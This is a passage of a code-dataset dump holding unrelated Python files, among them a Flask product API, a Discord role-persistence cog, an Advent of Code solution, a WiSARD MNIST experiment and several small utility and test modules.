self.add_multiple(FileGroup.from_files(TestBase.get_test_file_path('perf/employees.csv')), formats.CSV, 5)\n self.add_multiple(FileGroup.from_files(TestBase.get_test_file_path('mockaroo.com.json')), formats.JSON, 10)\n\n self.update_ids(4000)\n\n def add_multiple(self, fg, format, n=100):\n \"\"\" Adds filler data for paging tests. \"\"\"\n for i in xrange(n):\n self.add_fg(fg, format, name='Dummy', desc='Filler data')\n\n def update_ids(self, new_value):\n \"\"\" Updates sequences, so that the different groups start at fixed points each. 
\"\"\"\n cursor = connection.cursor()\n\n cursor.execute('select setval(\\'{}_id_seq\\', {})'.format(PackageModel._meta.db_table, new_value))\n cursor.execute('select setval(\\'{}_id_seq\\', {})'.format(FileGroupModel._meta.db_table, new_value))\n\n cursor.close()\n","sub_path":"src/main/python/hub/management/commands/loadfixtures.py","file_name":"loadfixtures.py","file_ext":"py","file_size_in_byte":8013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"582940668","text":"from http import HTTPStatus\n\nfrom flask import Flask, request, jsonify\nfrom flask.json import JSONEncoder\nfrom sqlalchemy import exists\nfrom sqlalchemy_utils import database_exists\nfrom sqlalchemy.ext.declarative import DeclarativeMeta\n\nfrom database.database import db_session, init_db\nfrom database.models.models import Product\nfrom system_config import (ALL_FIELDS, BASE_FIELDS, BILL_OF_MATERIALS, DUPLICATE_PRODUCT, GROUP, INCORRECT_DATA,\n INDEPENDENT, INDUSTRY_DEPENDENT, INDUSTRY_KEYS, MATERIALS, MESSAGES, MULTI_RELATIONS,\n NO_JSON, PRODUCT_CONFIG, PRODUCT_CREATED, PRODUCT_DEPENDENT, PRODUCT_GROUP, SINGLE_RELATIONS,\n TABLE_NAMES, UNKNOWN_API_KEY)\nfrom utils import get_or_create, get_or_create_multiple, get_class_by_table_name\n\n\nclass CustomJSONEncoder(JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj.__class__, DeclarativeMeta):\n return obj.to_dict()\n return super(CustomJSONEncoder, self).default(obj)\n\n\napp = Flask(__name__)\napp.json_encoder = CustomJSONEncoder\n\nif not database_exists('sqlite:///products.db'):\n init_db()\n\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db_session.remove()\n\n\nclass ProductCreator:\n \"\"\"\n Use this class to ease product creation.\n \"\"\"\n\n def __init__(self, data, product_type):\n self.data = data\n self.product_type = product_type\n self.objects = {}\n self.product_config = PRODUCT_CONFIG[product_type]\n\n def get_json_fields(self):\n \"\"\"\n Obtain a set of json fields supplied by the user.\n :return: set, set of fields in the json data.\n \"\"\"\n json_fields = set()\n for field in self.data:\n json_fields.add(field)\n return json_fields\n\n def check_all_fields_present(self, json_fields):\n \"\"\"\n Confirm all required fields present in json data supplied by the user.\n :param json_fields: set, set of json fields against which we need to make the check.\n :return: bool, True if all fields present, False otherwise.\n \"\"\"\n all_fields = set(self.product_config[ALL_FIELDS])\n return all_fields == json_fields\n\n def _cleanse_data(self):\n \"\"\"\n Convert json field names to system names (for family/range -> group and billOfMaterials -> materials).\n \"\"\"\n product_group = self.product_config[PRODUCT_GROUP]\n self.data[GROUP] = self.data[product_group]\n del(self.data[product_group])\n self.data[MATERIALS] = self.data[BILL_OF_MATERIALS]\n del(self.data[BILL_OF_MATERIALS])\n\n def _create_base_product(self):\n \"\"\"\n Creates base product without relationships that require its existence formerly. Needs objects from\n INDEPENDENT object names to exist first. 
Product is then flushed to the database but not committed.\n :return: product, instance of a product\n \"\"\"\n product_class = get_class_by_table_name(f'{self.product_type}_product')\n if product_class:\n # build kwargs for product\n product_kwargs = {}\n for field in self.product_config[BASE_FIELDS]:\n if field in self.product_config[SINGLE_RELATIONS]:\n product_kwargs[field] = self.objects[field]\n else:\n product_kwargs[field] = self.data[field]\n product, _ = get_or_create(product_class, **product_kwargs)\n db_session.add(product)\n db_session.flush()\n self.objects['product_id'] = product.id\n return product\n raise ValueError('Unknown product class')\n\n def _create_objects(self, object_names):\n \"\"\"\n Create objects from a list of object names.\n :param object_names: list, List of object names\n :return:\n \"\"\"\n for obj_name in object_names:\n if self.data.get(obj_name):\n data = self.data[obj_name]\n multiple = False\n if isinstance(data, list) or isinstance(data, dict):\n multiple = True\n table_name = TABLE_NAMES[obj_name]\n object_class = get_class_by_table_name(table_name)\n\n if object_class:\n if multiple:\n # inject product id into data dictionary for objects that need it as a field.\n if obj_name in self.product_config[PRODUCT_DEPENDENT]:\n for key, value in data.items():\n value['product_id'] = self.objects['product_id']\n self.objects[obj_name] = get_or_create_multiple(object_class, data=data)\n db_session.add_all(self.objects[obj_name])\n else:\n self.objects[obj_name], _ = get_or_create(object_class, name=self.data[obj_name])\n db_session.add(self.objects[obj_name])\n\n def create_product_from_data(self):\n \"\"\"\n Creates product and required objects it depends on from data.\n \"\"\"\n # Normalize field names to system names.\n self._cleanse_data()\n # create independent objects first: tags, group (family, range), customer as they do not need\n # anything to exist.\n self._create_objects(self.product_config[INDEPENDENT])\n\n # create product dependencies in database (ids will be needed to save the product object in next step)\n db_session.flush()\n base_product = self._create_base_product()\n # now create product dependent objects (those need product_id.\n self._create_objects(self.product_config[PRODUCT_DEPENDENT])\n\n # create industry specific dependent objects.\n multi_relations = self.product_config[MULTI_RELATIONS]\n if self.product_config.get(INDUSTRY_DEPENDENT):\n industry_dependent_relations = self.product_config[INDUSTRY_DEPENDENT]\n self._create_objects(industry_dependent_relations)\n multi_relations.extend(industry_dependent_relations)\n # append dependent objects to product\n for relation in multi_relations:\n # add objects to appropriate fields\n getattr(base_product, relation).extend(self.objects[relation])\n db_session.commit()\n\n\n@app.route('/products', methods=['GET', 'POST'])\ndef products():\n product_type = request.headers['X-API-KEY']\n # confirm correct API key used.\n if product_type not in INDUSTRY_KEYS:\n return MESSAGES[UNKNOWN_API_KEY], HTTPStatus.FORBIDDEN\n if request.method == 'POST':\n json_data = request.get_json()\n # Abort if no data supplied.\n if json_data is None:\n return MESSAGES[NO_JSON], HTTPStatus.BAD_REQUEST\n product_name = json_data.get('name')\n # Abort if product already exists.\n if product_name and db_session.query(exists().where(Product.name == product_name)).scalar():\n return MESSAGES[DUPLICATE_PRODUCT], HTTPStatus.BAD_REQUEST\n\n product_creator = ProductCreator(data=json_data, product_type=product_type)\n 
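# a possible shape for the TODO below (hypothetical, not wired in):\n        #     missing = set(PRODUCT_CONFIG[product_type][ALL_FIELDS]) - json_fields\n        #     return jsonify({'missing_fields': sorted(missing)}), HTTPStatus.BAD_REQUEST\n        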
# confirm all fields present before doing any work.\n # TODO: add info for customer - which fields are missing in the message.\n json_fields = product_creator.get_json_fields()\n if not product_creator.check_all_fields_present(json_fields):\n return MESSAGES[INCORRECT_DATA], HTTPStatus.BAD_REQUEST\n\n product_creator.create_product_from_data()\n\n return MESSAGES[PRODUCT_CREATED], HTTPStatus.CREATED\n else:\n # Retrieve all products here\n product_class = get_class_by_table_name(f'{product_type}_product')\n if product_class:\n retrieved_products = product_class.query.all()\n return jsonify(retrieved_products)\n return MESSAGES[UNKNOWN_API_KEY], HTTPStatus.NOT_FOUND\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"80135588","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport typing\n\nimport discord\nfrom discord.ext import commands\n\nfrom cogs.helpers import checks\n\nif typing.TYPE_CHECKING:\n from cogs.helpers.BamboBot import BamboBot\n\nfrom cogs.helpers.context import CustomContext\n\nclass RolePersist(commands.Cog):\n \"\"\"\n Przywracanie ról (RolePersist)\n \"\"\"\n\n def __init__(self, bot: 'BamboBot'):\n self.bot = bot\n self.api = bot.api\n\n async def is_role_persist_enabled(self, guild:discord.Guild):\n return await self.bot.settings.get(guild, \"rolepersist_enable\") and await self.bot.settings.get(guild, \"vip\")\n\n async def get_restorable_roles(self, guild, roles):\n my_top_role = guild.me.top_role\n\n restorable_roles = []\n for role in roles:\n if role < my_top_role:\n restorable_roles.append(my_top_role)\n\n async def log_role_persist(self, guild, member, roles_to_give):\n roles_to_give_names = [r.name for r in roles_to_give]\n roles_to_give_mentions = [r.mention for r in roles_to_give]\n\n\n reason = f\"Przywracanie ról dla {member.name}#{member.discriminator} w {guild}: {len(roles_to_give)} role do nadania: {roles_to_give_names}\"\n self.bot.logger.info(reason)\n\n logging_channel = await self.bot.get_cog('Logging').get_logging_channel(member.guild, \"logs_rolepersist_channel_id\")\n\n if not logging_channel:\n return 'No logging channel configured for RolePersist.'\n if not await self.bot.get_cog('Logging').perms_okay(logging_channel):\n return 'No permissions to log'\n embed = discord.Embed(title=f\"{member.name}#{member.discriminator} dołączył\",\n colour=discord.Colour.dark_blue(),\n description=f\"Nadano {len(roles_to_give)} ról\\n\"\n f\"{', '.join(roles_to_give_mentions)}\"\n )\n\n embed.set_author(name=\"Przywrócenie Ról\", url=\"https://bambobot.herokuapp.com\") # , icon_url=\"ICON_URL_DELETE\")\n\n embed.timestamp = datetime.datetime.utcnow()\n\n embed.set_footer(text=\"Role przywrócone\",\n icon_url=\"https://cdn.discordapp.com/avatars/552611724419792907/fded780340148db800e317cb4b417b88.png\")\n\n await logging_channel.send(embed=embed)\n\n @commands.command(hidden=True)\n @commands.guild_only()\n @checks.bot_have_permissions()\n @checks.have_required_level(8)\n async def clear_rp(self, ctx: 'CustomContext'):\n async with ctx.typing():\n guild = ctx.guild\n\n count = 0\n m_count = len(guild.members)\n cmc = 0\n hits = 0\n logs = ''\n to_delete = []\n msg = await ctx.send('**Usuwam niepotrzebne wpisy zapisanych ról...** \\n\\n\\nPobieram wszystkie wpisy dla serwera...')\n res = await self.api.get_stored_roles(guild, self.bot.user)\n rows = res['rows']\n rows_len = len(rows)\n logs = (f'**Usuwam niepotrzebne wpisy 
zapisanych ról...** \\n\\n\\n'\n f'Ilość wpisów dla serwera: `{rows_len}` \\n\\n'\n f'Porównuję listę użytkowników serwera do listy wpisów...')\n await msg.edit(content=logs)\n for i, member in enumerate(guild.members, start=1):\n if member.id in rows:\n cmc = i\n hits += 1\n to_delete.append(member.id)\n if i % 100 == 0:\n await msg.edit(content=logs + f'\\nSprawdzono `{i}/{m_count}` członków. \\nTrafiono `{hits}/{rows_len}` porównań')\n logs = (f'**Usuwam niepotrzebne wpisy zapisanych ról...** \\n\\n\\n'\n f'Ilość wpisów dla serwera: `{rows_len}` \\n'\n f'Porównano listę użytkowników do listy wpisów. \\n'\n f'Sprawdzono `{cmc}/{m_count}` członków. \\n'\n f'Trafiono `{hits}/{rows_len}` porównań.\\n\\n'\n f'Usuwam wpisy z bazy...')\n await msg.edit(content=logs)\n for i, member_id in enumerate(to_delete, start=1):\n member = guild.get_member(member_id)\n await self.api.delete_stored_roles(guild, member)\n count += 1\n if i % 100 == 0:\n await msg.edit(content=logs + f'\\nUsunięto `{count}/{len(to_delete)}` wpisów...')\n logs = (f'**Usunięto niepotrzebne wpisy zapisanych ról!** \\n\\n\\n'\n f'Ilość wpisów dla serwera: `{rows_len}` \\n'\n f'Porównano listę użytkowników do listy wpisów. \\n'\n f'Sprawdzono `{cmc}/{m_count}` członków. \\n'\n f'Trafiono `{hits}/{rows_len}` porównań.\\n\\n'\n f'Usunięto wpisy z bazy.\\n'\n f'Usunięto `{count}/{len(to_delete)}` wpisów.')\n await msg.edit(content=logs)\n\n # for i, member in enumerate(guild.members, start=1):\n # roles = await self.api.get_stored_roles(guild, member)\n # cmc = i\n # if len(roles) == 0:\n # pass\n # else:\n # await self.api.delete_stored_roles(guild, member)\n # count += 1\n # await msg.edit(content=f'🔁 Przetworzono `{i}/{m_count}` członków. \\n⏰ Usunięto `{count}` wpisów...')\n \n # await msg.edit(content=f'🔁 Przetworzono `{cmc}/{m_count}` członków. 
\\n✅ Usunięto `{count}` wpisów!')\n \n\n @commands.Cog.listener()\n async def on_member_join(self, member: discord.Member):\n guild = member.guild\n if not await self.is_role_persist_enabled(guild):\n return\n\n # print('getting stored roles')\n roles_to_give = await self.api.get_stored_roles(guild, member)\n # print(f'roles_to_give = {roles_to_give}')\n if len(roles_to_give) < 2:\n return\n await self.api.delete_stored_roles(guild, member)\n await member.edit(roles=roles_to_give, reason=\"Przywracanie ról\")\n await self.log_role_persist(guild, member, roles_to_give)\n\n @commands.Cog.listener()\n async def on_member_remove(self, member: discord.Member):\n guild = member.guild\n if not await self.is_role_persist_enabled(guild):\n return\n # print('saving roles to give')\n self.bot.logger.debug(f\"Użytkownik `{member}` opuścił serwer `{member.guild}`\")\n if len(member.roles) == 1:\n self.bot.logger.debug(f'Użytkownik `{member}` miał tylko jedną rolę (@everyone) - nie zapisuję')\n return\n elif len(member.roles) > 1:\n self.bot.logger.debug(f'Zapisuję {len(member.roles)} ról')\n await self.api.save_roles(guild, member, member.roles)\n # print(f'member.roles = {member.roles}')\n\n\n\n\ndef setup(bot: 'BamboBot'):\n bot.add_cog(RolePersist(bot))\n\n'''\nChanges by me:\n(1) Translated to polish\n(2) Changed embed url=\n(3) Changed embed icon_url=\n(4) Changed role persist so that the roles are not stored if the user had only one role (the default @everyone)\n=====\nMoje zmiany:\n(1) Przetłumaczono na polski\n(2) Zmieniono url= osadzenia\n(3) Zmieniono icon_url= osadzenia\n(4) Zmieniono trwałość ról w taki sposób, że role użytkownika nie są zapisywane, jeżeli posiadał on tylko jedną rolę (domyślną @everyone)\n'''","sub_path":"cogs/role_persist.py","file_name":"role_persist.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"104357352","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/chris/GitHub/MetaWards/build/lib.macosx-10.9-x86_64-3.7/metawards/extractors/_extract_default.py\n# Compiled at: 2020-04-20 09:02:59\n# Size of source mod 2**32: 1410 bytes\n__all__ = ['extract_default']\n\ndef extract_default(nthreads: int=1, setup=False, **kwargs):\n \"\"\"This returns the default list of 'output_XXX' functions that\n are called in sequence for each iteration of the model run.\n These functions are used to output data to files for\n future processing\n\n Parameters\n ----------\n nthreads: int\n The number of threads that will be used for each function.\n If this is 1, then the serial versions of the functions will\n be returned, else the parallel (OpenMP) versions will be\n returned\n setup: bool\n Whether or not to return the functions used to setup the\n space and output files for the output_XXX functions returned by\n this iterator. 
This is called once at the start of a run\n to return the functions that must be called to setup the\n model\n\n Returns\n -------\n funcs: List[function]\n The list of functions that ```extract_data``` will call in sequence\n \"\"\"\n if setup:\n from ._output_default import setup_output_default\n funcs = [\n setup_output_default]\n else:\n if nthreads is None or nthreads == 1:\n from ._output_default import output_default\n funcs = [\n output_default]\n else:\n from ._output_default import output_default_omp\n funcs = [\n output_default_omp]\n return funcs","sub_path":"pycfiles/metawards-0.8.5-cp37-cp37m-macosx_10_9_x86_64/_extract_default.cpython-37.py","file_name":"_extract_default.cpython-37.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"257609998","text":"import document\nimport sentence\nimport documentStreamError as dse\nimport os.path\n\nclass DocumentStream:\n \"\"\"\n This class handles file read and write tasks.\n \"\"\"\n\n def __init__(self, filename):\n self.filename = filename\n\n def readWhole(self):\n \"\"\"\n This method read from a file and returns a list of Sentence objects.\n \"\"\"\n try:\n if os.path.isfile(self.filename) == False:\n raise dse.DocumentStreamError(\"Not a file!\")\n except dse.DocumentStreamError as E:\n print(E.data)\n exit()\n\n f = open(self.filename, 'r')\n\n fileString = f.read()\n f.close()\n\n #fileString = [c for c in fileString if c not in ['\\n', '\\t']] # Remove all returns in the string\n\n sentenceList = []\n sent = ''\n spaceState = False\n\n\n ### If char is .!?; or new line, append sentence to sentenceList\n ### and reset sentence to empty string.\n\n for char in fileString:\n if char in ['\\n', '\\t']:\n char = ' '\n\n if char == ' ':\n if spaceState == True and sent != '':\n sentenceList.append(sentence.Sentence(sent))\n sent = ''\n elif spaceState == False:\n sent += char\n spaceState = True\n else:\n spaceState = False\n sent += char\n if char in '.!?;' and sent != '':\n sentenceList.append(sentence.Sentence(sent))\n sent = ''\n\n if sent != '':\n sentenceList.append(sentence.Sentence(sent))\n\n ### Handles the case that a sentence begins or ends with a space character.\n '''\n for i in sentenceList:\n if i.sentence[0] == ' ':\n i = sentence.Sentence(i.sentence[1:])\n if i.sentence[-1] == ' ':\n i = sentence.Sentence(i.sentence[:-1])\n '''\n\n return sentenceList\n\n def gutenberg(self, sentences):\n \"\"\"\n Returns the title and author information for a Gutenberg article.\n \"\"\"\n titleFound = False\n authorFound = False\n i = 0\n\n while not titleFound or not authorFound:\n if len(sentences[i].parseWords()) != 0 and not titleFound and sentences[i].parseWords()[0] == 'Title:':\n titleFound = True\n title = ' '.join(sentences[i].parseWords()[1:])\n\n if len(sentences[i].parseWords()) != 0 and not authorFound and sentences[i].parseWords()[0] == 'Author:':\n authorFound = True\n author = ' '.join(sentences[i].parseWords()[1:])\n\n i += 1\n\n return title, author\n\n\n def writeWhole(self, document):\n \"\"\"\n This method takes a Document object as input, and writes it into a file,\n with one sentence per output line.\n \"\"\"\n sentenceString = ''\n\n for sent in document._Document__sentence:\n sentenceString += sent.sentence + sent.punctuation + '\\n'\n\n newFilename = self.filename[:-4] + '_copy.txt'\n f = open(newFilename, 'w')\n f.write(sentenceString)\n 
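# a `with open(newFilename, 'w') as f:` block would close the file\n        # automatically; the explicit close mirrors the style used in readWhole()\n        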
f.close()\n","sub_path":"documentStream.py","file_name":"documentStream.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"401393410","text":"# Substance Batchtools SBSCOOKER module\r\n# Supports *.sbs only\r\n\r\nclass IOOptions(object):\r\n\r\n def __init__(self):\r\n self.inputs = []\r\n self.includes = \"\"\r\n self.alias = \"\"\r\n self.outputName = r\"{inputName}\"\r\n self.outputPath = \"\"\r\n self.merge = False\r\n self.noArchive = False\r\n\r\n\r\nclass CookingOptions(object):\r\n\r\n def __init__(self):\r\n self.noOptimization = False\r\n self.sizeLimit = \"4\"\r\n self.exposeOutputSize = \"1\"\r\n self.exposeRandomSeed = \"1\"\r\n self.exposePixelSize = \"0\"\r\n","sub_path":"BatchtoolsPy/BatchtoolsPy/sbscooker.py","file_name":"sbscooker.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319777217","text":"def analyze_xmas(xmas):\n preamble_size = 25\n preamble = []\n weakness = None\n i = 0\n\n while i < len(xmas):\n # add each number to the preamble list\n preamble.append(xmas[i])\n\n # check length of the preamble to see if analysis is required\n if len(preamble) > preamble_size:\n has_weakness = True\n target_number = preamble[-1]\n j = 0\n\n # analyze the target number with the values from preamble\n while j < len(preamble):\n compliment = target_number - preamble[j]\n if compliment in preamble:\n has_weakness = False\n j += 1\n\n # check to see if a weakness was found\n if has_weakness:\n weakness = target_number\n break\n\n # remove the first value from preamble to accommodate preamble size\n preamble = preamble[1:]\n\n i += 1\n return weakness\n\n\ndef main():\n xmas = []\n\n with open('input.txt') as file:\n for line in file:\n xmas.append(int(line))\n\n weakness = analyze_xmas(xmas)\n print(\"Weakness value:\", weakness)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"day 9/day_9_p1.py","file_name":"day_9_p1.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"610279105","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport struct\nimport timeit\nfrom numba import njit,jit,vectorize\nfrom numba import cuda\nimport numpy as np\n#import struct\nimport random\n#import matplotlib\nimport tensorflow as tf #i have tensorflow in the system, the tensorflow environment is also there\n #i am able to activate it in terminal by (conda activate tensorflow_gpuenv)\n #i am able to import it in gedit python file after that \n #but i am not able to import it in the anacoda(in this file)\n\n\n#def readFiles(labelsFilePath, imagesFilePath):\n# flImg = open(imagesFilePath, 'rb')\n# flLbl = open(labelsFilePath, 'rb')\n# (mNumberImg, sizeImg, height, width) = struct.unpack('>IIII', flImg.read(16))\n# (mNumberLbl, sizeLbl) = struct.unpack('>II', flLbl.read(8))\n# imgs = []\n# labels = map(ord, flLbl.readlines()[0])\n# for i in range(sizeImg):\n# imgs.append({'img': map(ord, list(flImg.read(width*height))), 'label': labels[i]})\n# flImg.close()\n# flLbl.close()\n# return imgs\n\n#@vectorize\n#@jit\n@jit \ndef preprocessing(tx_train, ty_train, tx_test, ty_test):\n \n py_train = ty_train.flatten()\n py_test = ty_test.flatten()\n \n# px_test = [l.tolist() for l in tx_test]\n# px_train = [l.tolist() for l in tx_train]\n# print(px_test) \n \n 
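# flatten each 28x28 MNIST image into a 784-element vector so that retina\n    # positions (pixel indices 0..783) can address individual pixels\n    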
px_test = tx_test.reshape(10000,784)\n px_train = tx_train.reshape(60000,784)\n #print(py_test)\n #print(px_train.shape)\n \n return px_train, py_train, px_test, py_test\n\n\n@jit\ndef concatenate_list_data(list):\n result= ''\n for element in list:\n result += str(element)\n return result\n\n@jit\ndef discriminator():\n# tt=0\n discriminator = []\n accumulated_pos = []\n my_list = list(range(0,784))\n for i in range(10): #10\n #print(1)\n ram = []\n #n_0 = [1990]\n# taken = []\n random.shuffle(my_list) #with this we can access every pixels of the image\n# n_0 =[]\n for j in range((int)((nodes))): #98 \n \n total_pos = []\n# total_pos1 = []\n positions = []\n \n #for k in range(no_of_rand_pix_selec): #8\n positions = my_list[j*8:j*8+8] #with this we can access every pixels of the image\n #print(positions)\n# for k in range(no_of_rand_pix_selec): #8\n## # this is wrong as for every ram in a discriminator this will reset\n# n = random.randint(1, input_size) #and we want it to reset after 98 ram of one discriminator\n# #but computer hange if i do it. so check later\n# for i in n_0:\n# if n != i:\n# positions.append(n) \n \n# n_0.append(n)\n# print(n_0)\n# if taken.count(n) == 0:\n# positions.append(n) \n #taken.append(n) \n \n #if tt < 1:\n # print(positions)\n # tt = tt + 1\n accumulated_pos.append(positions)\n total_pos = np.vstack(positions)\n #print(total_pos)\n \n table = []\n dictionary = {}\n max = len(\"{0:b}\".format(2**len(total_pos))) - 1\n for i in range(2**len(total_pos)):\n x = (('0' * max) + \"{0:b}\".format(i))\n x = x[len(x)-max:]\n dictionary[x] = 0\n #table.append({x: 0}) \n table.append(dictionary)\n \n# if tt < 1:\n# print(table)\n \n ram.append(table)\n \n discriminator.append(ram)\n# if tt <1:\n# print(discriminator)\n# tt = tt + 1\n #print(accumulated_pos[0])\n return discriminator, accumulated_pos\n \n \ndef train_discriminator_with_bleaching(myarray,myarray2,x_train, y_train):\n \n images = x_train\n lable = y_train \n \n for i,image in enumerate(images):\n# print(image)\n l = lable[i]\n num = l #have to check how to do it after i do the preprocessing part and see the dataset lable type\n all_ram_of_selected_discriminator = myarray[num]\n #print(all_ram)\n t_ratina = myarray2[(98*num):(98*num+98)]\n #print(t_ratina)\n for x,r in enumerate(all_ram_of_selected_discriminator): #here i want to iterate the ram of the perticular discriminator\n #print(x,r)\n #pattern_to_con = total_pos[r] # here i want to take only the positions of the node of that discriminator\n #print(x,r)\n ratina_for_one_ram = t_ratina[x]\n #print(ratina_for_one_ram)\n #for i in (0,len(ratina_for_one_ram)):\n # print(i)\n threshold = 0 # this define the threshold. right now if any one pixel in ratina(8) is >=1 then the value\n n = [] #saved is 1. 
if we want to chnage it we can \n for pix in ratina_for_one_ram: #like if value of 5 pixel is>=1 then save 1\n if image[(pix-1)]>=1:\n n.append(1)\n threshold = threshold + 1\n else:\n n.append(0)\n #print(n)\n \n address_of_that_ram = concatenate_list_data(n)\n #print(address_of_that_ram)\n #print(threshold)\n \n if threshold >= 1: #refer above comment\n for index,key in enumerate(r[0]):\n #print(1)\n #print(key)\n if key == address_of_that_ram:\n r[0][key] += 1\n #print(key)\n #print(index)\n #print(2)\n# r[address_of_that_ram] += 1\n# print(address_of_that_ram)\n# print(r[address_of_that_ram])\n# else:\n# print()\n #print(x,r[0])\n #address_of_one_ram = ','.join(n)\n #print(address_of_one_ram)\n \n return myarray\n#@vectorize(int(int,int,int,int))\ndef test_discriminator_with_bleaching(myarray,myarray2,x_test,y_test):\n right = 0\n wrong = 0\n images = x_test\n lable = y_test\n non_rec = 0\n \n for i,image in enumerate(images):\n actual_lable = lable[i]\n #sum_of_ram_output = []\n# print(image)\n total_sum=[]\n# total_sum_of_all_ram=[]\n for index,dis in enumerate(myarray):\n t_ratina = myarray2[(98*index):(98*index+98)]\n \n sum_of_ram_output = 0\n for x,r in enumerate(dis):\n ratina_for_one_ram = t_ratina[x]\n \n n = [] \n for pix in ratina_for_one_ram:\n if image[(pix-1)]>=1:\n n.append(1)\n else:\n n.append(0)\n #print(n)\n \n address_of_that_ram = concatenate_list_data(n)\n #print(address_of_that_ram)\n \n \n for index,key in enumerate(r[0]):\n if key == address_of_that_ram and r[0][key]>=1:\n #print(111)\n #print(key,r[0][key])\n sum_of_ram_output += 1\n \n \n total_sum.append(sum_of_ram_output)\n# print(1)\n print(total_sum)\n \n if max(total_sum) >= 1:\n index_of_dis = total_sum.index(max(total_sum))\n if index_of_dis == actual_lable:\n right += 1\n #print(1)\n else:\n wrong += 1\n #print(0)\n \n else:\n #wrong += 1\n non_rec += 1\n \n print(1) \n print(\"non recognized images = \", non_rec)\n \n \n return right,wrong\n\n\n\nif __name__ == \"__main__\":\n\n # the mnist has 28*28(784) pixels that we need to train in the discriminator\n # we have to initialize 10 discriminator for 0 to 9 number images(one discriminator for one pattern)\n # We are taking \n #\n \n input_size = 28*28\n no_of_rand_pix_selec = 8 \n nodes = input_size/no_of_rand_pix_selec #98\n #print(nodes)\n #n = random.randint(1, input_seize)\n #print(n)\n \n# imagesTrainingFile = 'train-images-idx3-ubyte'\n# labelsTrainingFile = 'train-labels-idx1-ubyte'\n# imagesTestFile = 't10k-images-idx3-ubyte'\n# labelsTestFile = 't10k-labels-idx1-ubyte'\n# \n# training = readFiles(labelsTrainingFile, imagesTrainingFile)\n# \n# for i in range(3):\n# print(training[i])\n \n x_train1 = np.random.randint(10, size=784)\n x_train2 = np.random.randint(10, size=784)\n x_train3 = np.random.randint(10, size=784)\n x_train = [x_train1,x_train2,x_train3]\n y_train = [0,1,2] \n #print(x_train[0])\n \n \n x_test1 = np.random.randint(10, size=784)\n #print(x_test1)\n x_test2 = np.zeros(784) #use this for accuracy = 0 check\n x_test = [x_train1,x_test1,x_test2] #use this for accuracy = 100 check\n# print(x_test)\n y_test = [0,1,2]\n #print(x_test[0],x_test1)\n \n #d = []\n d, acc_pos = discriminator()\n \n print(type(d))\n print(type(d[0]))\n print(type(d[0][0][0]))\n \n dictlist = []\n #i am trying to make list into array so that i can use numba\n \n for key, value in d[0][0][0].items():\n temp = [key,value]\n dictlist.append(temp)\n \n print(dictlist)\n \n myarray = np.asarray(dictlist, dtype = int)\n myarray2 = np.asarray(acc_pos, dtype = 
int)\n \n #print(d[0][0])\n #print(acc_pos)\n #print(x_train)\n (tx_train, ty_train), (tx_test, ty_test) = tf.keras.datasets.mnist.load_data()\n px_train, py_train, px_test, py_test = preprocessing(tx_train, ty_train, tx_test, ty_test)\n \n #print(px_train)\n \n# print(px_test[0].shape)\n \n \n train_the_network = train_discriminator_with_bleaching(myarray,myarray2,px_train[0:5000],py_train[0:5000])\n #print(view)\n #print(x_test[1])\n #print(d[0][0])\n right,wrong = test_discriminator_with_bleaching(myarray,myarray2,px_test[0:1000],py_test[0:1000])\n print(\"number of right result = \",right)\n print(\"number of wrong results = \",wrong)\n \n accuracy = ((right)/(right+wrong))*100\n print(\"accuracy by testing the model =\",accuracy)\n \n \n# print(x_test.shape)\n# print(y_test.shape)\n \n# print(ty_test.shape)\n# ty_test.flatten()\n# print(ty_test)\n# print(tx_train[0].flatten().shape)\n# print(tx_train[0].flatten())\n #print(timeit.timeit(discriminator())) ","sub_path":"code/fail_wisard_implimentation_on_cpu.py","file_name":"fail_wisard_implimentation_on_cpu.py","file_ext":"py","file_size_in_byte":11445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"540479050","text":"from models.project import Project\nimport random\nimport string\n\n\ndef random_string(maxlen):\n symbols = string.ascii_letters\n return \"\".join(\n [random.choice(symbols) for i in range(random.randrange(maxlen))])\n\n\ndef test_create_project(app):\n project = Project(name=random_string(20), description=random_string(20))\n app.session.login(\"administrator\", \"root\")\n old_projects = app.soap.get_projects_list(\"administrator\", \"root\")\n\n for p in old_projects:\n if p.name == project.name:\n project = Project(name=random_string(20),\n description=random_string(20))\n\n app.project.create(project)\n new_projects = app.soap.get_projects_list(\"administrator\", \"root\")\n assert len(old_projects) == len(new_projects) - 1\n assert project in new_projects\n","sub_path":"tests/test_create_project.py","file_name":"test_create_project.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"482713638","text":"# coding=utf8\n\nimport getopt\nfrom selenium import webdriver\n\nclass Chat(object):\n ROBOT_LIBRARY_SCOPE = 'GLOBAL'\n\n def __init__(self,url):\n self.url = url\n\n def usage(self):\n print (u'请输入通道参数,例如输入: -x /a')\n s = input('>>>')\n s = s.split()\n opts, args = getopt.getopt(s, 'x:', ['filename='])\n try:\n for opt, arg in opts:\n if opt in ('-x', '--filename'):\n name = arg\n return name\n except getopt.GetoptError as e:\n print (e)\n exit()\n\n # 初始化\n def SetupWebTest(self,driveType='chrome'):\n if 